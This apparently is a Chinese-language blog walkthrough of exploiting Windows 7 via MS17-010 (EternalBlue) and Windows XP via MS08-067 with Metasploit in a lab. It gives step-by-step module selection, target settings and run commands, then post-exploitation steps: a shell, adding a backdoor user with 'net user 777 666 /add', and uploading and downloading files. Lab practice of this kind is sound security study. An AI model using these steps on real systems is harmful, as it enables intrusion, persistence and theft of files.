MS17-010
永恒之蓝是ms17-010 是17年发现的
msconsole简称msf 是一款常用的安全测试工具,包含了各种常见漏洞利用模块
我们先要去关闭win7的防火墙
win7
1.联网状态下

kali攻击机 ifconfig 192.168.109.141
Windows7 x64 ipconfig 192.168.109.142
2.查看电脑的IP地址,kali使用ifconfig命令,Windows使用ipconfig。


3.我们ping一下,发现是可以ping通的

4.扫描一下

两个都可以扫出来,顺便看看445端口

5.用msfconsole,每次用的时候都会出来不一样的形状,这个无所谓

6.search ms17-010,第一个就是永恒之蓝

7.我们就是用前面的编号去代表 use 0

RHOSTS代表的是靶机,LHOST 代表攻击机
8.我们接下来就可以设置目标对象,看看有没有设置成功,看到刚刚的RHOSTS出现了靶机的IP地址,就说明我们设置成功了

9.run,看到下面的win就说明成功了

接着证明一下,截图看看
screenshot

进入终端就直接shell
设置新的用户
net user 777 666 /add 前面的是账户名,后面的是密码,出现以下的就说明创建成功了
我们还可以上传文件
upload 文件名 位置 就可以了,同样也可以download去下载对方的文件


MS08-067
winxp 08年被发现的
1、执行命令:msfconsole
2、执行命令:search ms08-067
3、执行命令:use 0
4、执行命令:show options //查看一下
5、执行命令:show targets
6、执行命令:set target 34 //指明目标
7、执行命令:set rhost 192.168.244.133 //设置目标对象
8、执行命令:show options // 查看是否设置成功
9、执行命令:run //或者是exploit也可以的

1411

被折叠的 条评论
为什么被折叠?



